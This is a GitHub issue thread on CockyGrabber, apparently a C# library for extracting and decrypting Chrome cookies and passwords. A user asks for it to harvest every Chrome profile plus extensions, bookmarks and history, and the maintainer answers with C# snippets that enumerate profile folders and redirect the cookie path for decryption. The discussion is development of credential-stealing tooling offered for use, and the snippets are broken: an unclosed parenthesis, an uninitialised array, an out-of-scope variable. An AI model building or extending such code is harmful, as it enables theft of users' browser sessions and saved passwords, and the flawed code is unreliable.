### ISSUE TITLE
Only grabs default user profile for Chrome

### ISSUE THREAD

**Issue by rolltidehero** [Stanley-GF/CockyGrabber#2]
Most Chrome users create an online profile for Chrome so they can sync all their stuff.

These new profiles get named Profile 1, Profile 2, Profile 3, etc.

This is why it wouldn't didn't pull anything for my Chrome.

Can you have it include ever Profile folder in User Data?

Also, can you grab Extensions, Extensions Data, Bookmarks & History?

![image](https://user-images.githubusercontent.com/11590510/110196681-cd5b8800-7e0b-11eb-8241-c9444f6512ca.png)

**Comment by Stanley-GF** [comment]
Hi, 
First, thanks for reported me this problem, 
I can do a system where you can choose profile, and in your code for example 
```
ChromeGrabber grabber = ChromeGrabber("Profile 1");
```

It's this you want?

**Comment by rolltidehero** [comment]
No, I need it to iterate and grab the files for each profile that's found, because they all may have something different and useful.

**Comment by Stanley-GF** [comment]
Yes it's what i'm telling you, example 
```cs
ChromeGrabber grabber = ChromeGrabber("Profile 1");
```
So after you can do 

```cs
string[] profiles;
foreach (var item in Directory.GetDirectories("path of google"))
{
       if (item.Contains("Profile")
       {
              profiles.add(item);
       }
}
// so 
ChromeGrabber grabber = new ChromeGrabber(item[0]); // for get Profile 1 for example
```

**Comment by Stanley-GF** [comment]
In this case, if i'm good, you can change the password path / cookie path: 

```cs
                CockyGrabber.ChromeGrabber yourgrabber = new CockyGrabber.ChromeGrabber();
                yourgrabber.ChromeCookiePath = "path of the chrome profile cookie where you want to decrypt...";
                // and your code
